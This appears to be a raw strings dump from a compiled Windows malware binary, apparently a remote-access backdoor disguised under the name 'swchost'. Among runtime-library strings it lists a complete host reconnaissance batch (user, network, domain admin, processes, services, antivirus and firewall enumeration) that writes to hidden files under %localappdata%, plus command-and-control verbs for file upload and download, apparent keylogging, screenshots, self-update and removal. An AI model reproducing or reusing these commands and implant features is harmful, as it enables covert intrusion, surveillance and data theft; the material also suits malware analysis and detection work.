dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
(null)
`h````
xpxxxx
pScheduler
version
eventObject
ppVirtualProcessorRoots
UTF-16LE
UNICODE
_nextafter
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
 delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
 new[]
 delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
 Type Descriptor'
 Base Class Descriptor at (
 Base Class Array'
 Class Hierarchy Descriptor'
 Complete Object Locator'
`h`hhh
xppwpp
MessageBoxW
GetActiveWindow
GetLastActivePopup
GetUserObjectInformationW
GetProcessWindowStation
CreateFile2
SchedulerKind
MaxConcurrency
MinConcurrency
TargetOversubscriptionFactor
LocalContextCacheSize
ContextStackSize
ContextPriority
SchedulingProtocol
DynamicProgressFeedback
WinRTInitialization
MaxPolicyElementKey
Mbp?333333
pContext
pExecutionResource
CreateRemoteThreadEx
CreateUmsCompletionList
CreateUmsThreadContext
DeleteProcThreadAttributeList
DeleteUmsCompletionList
DeleteUmsThreadContext
DequeueUmsCompletionListItems
EnterUmsSchedulingMode
ExecuteUmsThread
GetCurrentUmsThread
GetNextUmsListItem
GetUmsCompletionListEvent
InitializeProcThreadAttributeList
QueryUmsThreadInformation
SetUmsThreadInformation
UmsThreadYield
UpdateProcThreadAttribute
RoInitialize
RoUninitialize
RegisterTraceGuidsW
UnregisterTraceGuids
TraceEvent
GetTraceLoggerHandle
GetTraceEnableLevel
GetTraceEnableFlags
pThreadProxy
1#SNAN
1#QNAN
?UUUUUU
?UUUUUU
?UUUUUU
?UUUUUU
switchState
Access violation - no RTTI data!
Bad dynamic_cast!
?8bunz8
?@En[vP
[*ncd>0
S>$hkDh$h>[2
UA>N0Wl
bad locale name
bad cast
ios_base::badbit set
ios_base::failbit set
generic
iostream
iostream stream error
unknown error
ios_base::eofbit set
invalid string position
string too long
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
A67D0DB8A2A173347654432503702AA3
A67D0DB8A2A173347654432503702222
A67D0DB885A3432576548A2A03707334
A67D0DB885A3432576548A2A03701111
20202020202020202020202020202020
A67D0DB885A343257654
20202020202020202020202020201111
A67D0DB885A3432576548A2A00001111
20202020202020202020202020202222
n.n.fc.
2020202020202020202020202020
                
2020:2020:2020:2020:2020:2020:2020:2222
|#|DownloadFile|#|Commandexecuted successfully
R:SF?commandId=CmdResult=
n.n.v.
00000000-0000-0000-0000-000000000000
Microsoft\windows\Tmp98871
cmd /a /c echo =========================== (User Name) ========================== > "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c echo %userdomain%\%username% >>"%localappdata%\Microsoft\Windows\jTmp765643.txt" 2>&1
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c echo ========================== (IP Config) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c ipconfig /all >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c echo ========================== (Net View) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c net view >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c echo ========================== (Net User) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c net user administrator /domain >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c echo ========================== (NetStat) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c netstat -ant >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c echo ========================== (SystemInfo) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c systeminfo >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c echo ========================== ( TaskList) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c tasklist >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c echo ========================== ( ServiceList) ========================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c sc query >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo off
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c @echo: >>"%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /a /c echo ========= (SecInfo) ================== >> "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /u /c type "%localappdata%\Microsoft\Windows\jTmp765643.txt" > "%localappdata%\Microsoft\Windows\tmp765643.txt"
del "%localappdata%\Microsoft\Windows\jTmp765643.txt"
del "%localappdata%\Microsoft\Windows\jTmp765643.txt"
cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter  Path AntiVirusProduct 	Get   >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c echo --------------------------------------------------------------------------- 				     >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct 	Get   >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c echo --------------------------------------------------------------------------- 				     >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter  Path FirewallProduct 	Get  	/Format:List >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c echo --------------------------------------------------------------------------- 				     >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct 	Get     /Format:List >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c echo --------------------------------------------------------------------------- 				     >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter  Path AntiSpywareProduct  Get   	/Format:List >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c echo --------------------------------------------------------------------------- 				     >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiSpywareProduct  Get  	/Format:List >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
cmd /u /c echo --------------------------------------------------------------------------- 				     >>	"%localappdata%\Microsoft\Windows\Tmp765643.txt"
rem %localappdata%\Microsoft\Windows\Tmp765643.txt#1;
Microsoft\Windows\TmpFiles\
:\windows\temp\tmp887399
" & echo "Finished" >> "
ipconfig /all > "
"Finished"
DNS Servers
c:\windows\temp\tmp8873
%appdata%
Microsoft\Windows
%programdata%
echo %programdata% > "
Executed Successfully
R:GF?cId=
&message=
appId=
&type=
R:ReId?Id=
General
DownloadFile
UploadFile
R:SF?cId=
" & timeout /t 3 /nobreak & start "" "
\dd" "
move "
Replacement Done
Replace bad file
R:GAC?appId=
R:CR?cd=
ChangeAliveSeconds
ChangeAddress
\Microsoft\Windows\Tmp9932u1.bat
GetConfig
GetConfig:::
RunNewVersion
restart
remove
FastAlive
Not Done
ExecuteKL
GetVersion
PauseUpload
ResumeUpload
PauseDownload
ResumeDownload
ImmediateResetRam
&uniqueId=
R:AV?appId=
,why=ram,size=
" wait=10000)
Restart on high level ram usage, 
invalid unordered_map<K, T> key
vector<T> too long
invalid vector<T> subscript
list<T> too long
invalid stoi argument
stoi argument out of range
0123456789ABCDEF
Qkkbal
Qkkbal
system
8.8.8.8
1.0.197
need dictionary
invalid literal/length code
invalid distance code
invalid block type
invalid stored block lengths
too many length or distance symbols
invalid bit length repeat
oversubscribed dynamic bit lengths tree
incomplete dynamic bit lengths tree
oversubscribed literal/length tree
incomplete literal/length tree
oversubscribed distance tree
incomplete distance tree
empty distance tree with lengths
unknown compression method
invalid window size
incorrect header check
incorrect data check
 2>&1)  > "
(taskkill /f /pid "
ct_init: length != 256
ct_init: dist != 256
ct_init: 256+dist != 512
bit length overflow
code %d bits %d->%d
inconsistent bit counts
gen_codes: max_code %d 
dyn trees: dyn %ld, stat %ld
not enough codes
too many codes
bl counts: 
bl code %2d 
bl tree: sent %ld
lit tree: sent %ld
dist tree: sent %ld
lit data: dyn %ld, stat %ld
dist data: dyn %ld, stat %ld
opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u 
bad compressed size
ct_tally: bad match
last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%) 
bad d_code
invalid length
output buffer too small for in-memory compression
bad pack level
insufficient lookahead
no future
wild scan
more < 2
C:\Users\Void\Desktop\wmiPrv\v 10.0.197\x64\Release\swchost.pdb
WideCharToMultiByte
RaiseException
GetLastError
InitializeCriticalSectionAndSpinCount
DeleteCriticalSection
CloseHandle
DecodePointer
CreateThread
SetEvent
WaitForSingleObject
HeapAlloc
HeapFree
HeapReAlloc
HeapSize
GetProcessHeap
CreateTimerQueue
CreateEventW
CreateTimerQueueTimer
DeleteTimerQueueTimer
DeleteTimerQueue
GetCurrentProcessId
CreateToolhelp32Snapshot
Process32NextW
SetConsoleCtrlHandler
SetErrorMode
SetUnhandledExceptionFilter
CreateFileA
SetFilePointer
ReadFile
SystemTimeToFileTime
GetCurrentDirectoryW
MultiByteToWideChar
LocalFileTimeToFileTime
GetFileAttributesW
CreateDirectoryW
CreateFileW
WriteFile
SetFileTime
DeleteFileW
FindFirstFileW
GetModuleFileNameW
CreateProcessW
GetConsoleWindow
FindNextFileW
FindClose
OpenProcess
TerminateProcess
GetFileAttributesA
GetWindowsDirectoryW
GetCurrentProcess
GetSystemInfo
FileTimeToSystemTime
GetFileInformationByHandle
GetFileSize
UnmapViewOfFile
GetLocalTime
GetTickCount
KERNEL32.dll
GetMessageW
DispatchMessageW
TranslateMessage
GetSystemMetrics
LoadAcceleratorsW
TranslateAcceleratorW
wsprintfW
ReleaseDC
GetDesktopWindow
USER32.dll
CreateCompatibleBitmap
CreateCompatibleDC
SelectObject
BitBlt
DeleteObject
GDI32.dll
SHGetSpecialFolderPathW
SHGetFolderPathW
SHELL32.dll
StringFromGUID2
CoCreateGuid
ole32.dll
GdipGetImageEncodersSize
GdipGetImageEncoders
GdiplusStartup
GdipCreateBitmapFromHBITMAP
GdipFree
GdipAlloc
GdipCloneImage
GdipDisposeImage
GdipSaveImageToFile
GdiplusShutdown
gdiplus.dll
WS2_32.dll
QueryWorkingSet
GetProcessMemoryInfo
PSAPI.DLL
GetCurrentThreadId
GetStringTypeW
EncodePointer
EnterCriticalSection
LeaveCriticalSection
GetSystemTimeAsFileTime
IsDebuggerPresent
IsProcessorFeaturePresent
ExitProcess
GetModuleHandleExW
GetProcAddress
AreFileApisANSI
GetCPInfo
GetCommandLineA
RtlPcToFileHeader
RtlLookupFunctionEntry
RtlUnwindEx
WaitForSingleObjectEx
SignalObjectAndWait
SwitchToThread
SetThreadPriority
GetThreadPriority
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
GetLogicalProcessorInformation
ChangeTimerQueueTimer
GetModuleHandleW
GetNumaHighestNodeNumber
GetProcessAffinityMask
SetThreadAffinityMask
RegisterWaitForSingleObject
UnregisterWait
RtlCaptureContext
RtlVirtualUnwind
UnhandledExceptionFilter
SetLastError
GetStartupInfoW
CreateSemaphoreW
GetDateFormatW
GetTimeFormatW
CompareStringW
LCMapStringW
GetLocaleInfoW
IsValidLocale
GetUserDefaultLCID
EnumSystemLocalesW
GetConsoleCP
GetConsoleMode
IsValidCodePage
GetACP
GetOEMCP
GetCurrentThread
GetStdHandle
FreeLibrary
LoadLibraryExW
MoveFileExW
GetFileType
SetFilePointerEx
FlushFileBuffers
GetModuleFileNameA
QueryPerformanceCounter
GetEnvironmentStringsW
FreeEnvironmentStringsW
OutputDebugStringW
GetThreadTimes
FreeLibraryAndExitThread
GetModuleHandleA
GetVersionExW
VirtualAlloc
VirtualFree
VirtualProtect
DuplicateHandle
ReleaseSemaphore
InitializeSListHead
InterlockedPopEntrySList
InterlockedPushEntrySList
InterlockedFlushSList
QueryDepthSList
UnregisterWaitEx
GetTimeZoneInformation
SetStdHandle
WriteConsoleW
ReadConsoleW
LoadLibraryW
SetEndOfFile
SetEnvironmentVariableA
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_alloc@std@@
.?AVlength_error@std@@
.?AV_Locimp@locale@std@@
.?AV?$num_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AV?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AV?$numpunct@D@std@@
.?AV?$codecvt@GDH@std@@
.?AV?$ctype@G@std@@
.?AV?$num_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@
.?AV?$num_get@GV?$istreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@
.?AV?$numpunct@_W@std@@
.?AUmessages_base@std@@
.?AUmoney_base@std@@
.?AUtime_base@std@@
.?AV?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@
.?AV?$collate@_W@std@@
.?AV?$messages@_W@std@@
.?AV?$money_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@
.?AV?$money_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@
.?AV?$moneypunct@_W$0A@@std@@
.?AV?$_Mpunct@_W@std@@
.?AV?$moneypunct@_W$00@std@@
.?AV?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@
.?AV?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@
.?AV?$num_put@GV?$ostreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@
.?AV?$numpunct@G@std@@
.?AV?$collate@G@std@@
.?AV?$messages@G@std@@
.?AV?$money_get@GV?$istreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@
.?AV?$money_put@GV?$ostreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@
.?AV?$moneypunct@G$0A@@std@@
.?AV?$_Mpunct@G@std@@
.?AV?$moneypunct@G$00@std@@
.?AV?$time_get@GV?$istreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@
.?AV?$time_put@GV?$ostreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@
.?AV?$collate@D@std@@
.?AV?$messages@D@std@@
.?AV?$money_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AV?$money_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AV?$moneypunct@D$0A@@std@@
.?AV?$_Mpunct@D@std@@
.?AV?$moneypunct@D$00@std@@
.?AV?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AV?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AVtype_info@@
.?AVbad_typeid@std@@
.?AV__non_rtti_object@std@@
.?AVbad_exception@std@@
.?AVimproper_lock@Concurrency@@
.?AVWaitBlock@details@Concurrency@@
.?AVSingleWaitBlock@details@Concurrency@@
.?AVMultiWaitBlock@details@Concurrency@@
.?AVWaitAllBlock@details@Concurrency@@
.?AVWaitAnyBlock@details@Concurrency@@
.?AV?$_MallocaArrayHolder@PEAVContext@Concurrency@@@details@Concurrency@@
.?AVscheduler_resource_allocation_error@Concurrency@@
.?AVinvalid_operation@Concurrency@@
.?AV_Interruption_exception@details@Concurrency@@
.?AVscheduler_worker_creation_error@Concurrency@@
.?AVunsupported_os@Concurrency@@
.?AVimproper_scheduler_attach@Concurrency@@
.?AVimproper_scheduler_reference@Concurrency@@
.?AVcontext_unblock_unbalanced@Concurrency@@
.?AVcontext_self_unblock@Concurrency@@
.?AVmissing_wait@Concurrency@@
.?AVinvalid_scheduler_policy_key@Concurrency@@
.?AVinvalid_scheduler_policy_value@Concurrency@@
.?AVinvalid_scheduler_policy_thread_specification@Concurrency@@
.?AVnested_scheduler_missing_detach@Concurrency@@
.?AVinvalid_oversubscribe_operation@Concurrency@@
.?AVResourceManager@details@Concurrency@@
.?AUIResourceManager@Concurrency@@
.?AUITopologyExecutionResource@Concurrency@@
.?AUITopologyNode@Concurrency@@
.?AUTopologyObject@GlobalCore@details@Concurrency@@
.?AUTopologyObject@GlobalNode@details@Concurrency@@
.?AVScheduleGroupBase@details@Concurrency@@
.?AVScheduleGroup@Concurrency@@
.?AVCacheLocalScheduleGroup@details@Concurrency@@
.?AVFairScheduleGroup@details@Concurrency@@
.?AVSchedulerBase@details@Concurrency@@
.?AVScheduler@Concurrency@@
.?AU_Chore@details@Concurrency@@
.?AVRealizedChore@details@Concurrency@@
.?AVCacheLocalScheduleGroupSegment@details@Concurrency@@
.?AVScheduleGroupSegmentBase@details@Concurrency@@
.?AVFairScheduleGroupSegment@details@Concurrency@@
.?AVContextBase@details@Concurrency@@
.?AVContext@Concurrency@@
.?AV_RefCounter@details@Concurrency@@
.?AV_CancellationTokenRegistration@details@Concurrency@@
.?AVCancellationTokenRegistration_TaskProc@details@Concurrency@@
.?AV?$_MallocaArrayHolder@PEAVevent@Concurrency@@@details@Concurrency@@
.?AVExecutionResource@details@Concurrency@@
.?AUIExecutionResource@Concurrency@@
.?AVSchedulerProxy@details@Concurrency@@
.?AUISchedulerProxy@Concurrency@@
.?AVFreeThreadProxy@details@Concurrency@@
.?AVThreadProxy@details@Concurrency@@
.?AUIThreadProxy@Concurrency@@
.?AUIThreadProxyFactory@details@Concurrency@@
.?AVFreeThreadProxyFactory@details@Concurrency@@
.?AV?$ThreadProxyFactory@VFreeThreadProxy@details@Concurrency@@@details@Concurrency@@
.?AVVirtualProcessor@details@Concurrency@@
.?AVInternalContextBase@details@Concurrency@@
.?AUIExecutionContext@Concurrency@@
.?AVExternalContextBase@details@Concurrency@@
.?AVThreadScheduler@details@Concurrency@@
.?AUIScheduler@Concurrency@@
.?AVThreadInternalContext@details@Concurrency@@
.P6AXPEAV__ExceptionPtr@@@Z
.?AV_Ref_count_base@std@@
.?AV?$_Ref_count@V__ExceptionPtr@@@std@@
.?AV?$_Ref_count_del_alloc@V__ExceptionPtr@@P6AXPEAV1@@ZV?$_DebugMallocator@H@@@std@@
.?AVVirtualProcessorRoot@details@Concurrency@@
.?AUIVirtualProcessorRoot@Concurrency@@
.?AVFreeVirtualProcessorRoot@details@Concurrency@@
.?AVThreadVirtualProcessor@details@Concurrency@@
.?AV?$ctype@D@std@@
.?AUctype_base@std@@
.?AVfacet@locale@std@@
.?AVbad_cast@std@@
.?AV_Facet_base@std@@
.?AV_Iostream_error_category@std@@
.?AV_Generic_error_category@std@@
.?AVerror_category@std@@
.?AVfailure@ios_base@std@@
.?AVsystem_error@std@@
.?AV_System_error@std@@
.?AVruntime_error@std@@
.?AVexception@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ifstream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ofstream@DU?$char_traits@D@std@@@std@@
.?AV?$codecvt@DDH@std@@
.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@
.?AVcodecvt_base@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AVout_of_range@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AVios_base@std@@
.?AV?$_Iosb@H@std@@
.?AVinvalid_argument@std@@
.?AV_System_error_category@std@@
.?AV?$codecvt_utf8_utf16@_W$0BAPPPP@$0A@@std@@
.?AV?$codecvt_utf8@_W$0BAPPPP@$0A@@std@@
.?AV?$basic_ofstream@_WU?$char_traits@_W@std@@@std@@
.?AV?$basic_ifstream@_WU?$char_traits@_W@std@@@std@@
.?AV?$basic_filebuf@_WU?$char_traits@_W@std@@@std@@
.?AV?$ctype@_W@std@@
.?AV?$basic_istream@_WU?$char_traits@_W@std@@@std@@
.?AV?$codecvt@_WDH@std@@
.?AV?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@
.?AV?$basic_ostream@_WU?$char_traits@_W@std@@@std@@
.?AVBitmap@Gdiplus@@
.?AVImage@Gdiplus@@
.?AVGdiplusBase@Gdiplus@@
.?AVlogic_error@std@@
.?AV?$basic_ios@_WU?$char_traits@_W@std@@@std@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>